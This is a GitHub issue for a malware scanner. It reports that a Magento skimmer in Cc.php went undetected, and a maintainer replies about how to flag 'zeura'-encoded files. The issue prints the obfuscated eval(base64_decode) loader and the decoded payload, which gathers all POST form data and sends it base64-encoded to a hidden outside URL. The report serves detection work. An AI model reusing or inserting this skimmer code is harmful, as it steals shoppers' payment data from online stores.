Malware not detected in Cc.php and Mage_Payment_Model_Method_Cc.php #229
Comments
|
Thanks for submitting. I'm not sure how we should proceed here, unless we would flag all "zeura" encrypted files. Perhaps, we should flag the existence of "zeura" in specific Magento files. Then, we would have to rewrite the scanner to pass the filename as attribute to the scan function. See also VirusTotal/yara#202 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
I found this line manually after deep mwsan
<?php/*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(FILE); eval(base64_decode("ENCRYPT...`when I decrypt Zeura I get the folllowing code at the end of the file
if(isset($_POST)){$EvxCq = WmJQW('',$_POST,0); $_COOKIE['BMMLN']!=null?$SflHflmRjQ=$_COOKIE['BMMLN']:setcookie('BMMLN', $SflHflmRjQ=time().'-'.crc32(uniqid()),time()+86000,'/',$_SERVER['HTTP_HOST']);file_get_contents(base64_decode( 'aHR0cHM6Ly9sb2NhbHNlcnZlci5ob3N0L2FwaS9pbmRleC5waHA='), FALSE,stream_context_create(array('http'=>array('method'=>'POST', 'header'=>'Content-type: application/x-www-form-urlencoded', 'content'=>http_build_query(array('info'=>base64_encode($EvxCq), 'hostname'=>$_SERVER['HTTP_HOST'],'sub'=>2,'key'=>$SflHflmRjQ))))));} function WmJQW($bRrNN,$CYRnG,$qabbF) {foreach($CYRnG as $vikBC => $PmGhs) {if(!is_array($PmGhs)) { if($qabbF == 1) {$dwTSf[] = $bRrNN.'['.$vikBC.']='.$PmGhs;}else {$dwTSf[] = $vikBC.'='.$PmGhs;} }else {$dwTSf[] = WmJQW($vikBC,$PmGhs,1);}}return implode('&',$dwTSf);} ?>The text was updated successfully, but these errors were encountered: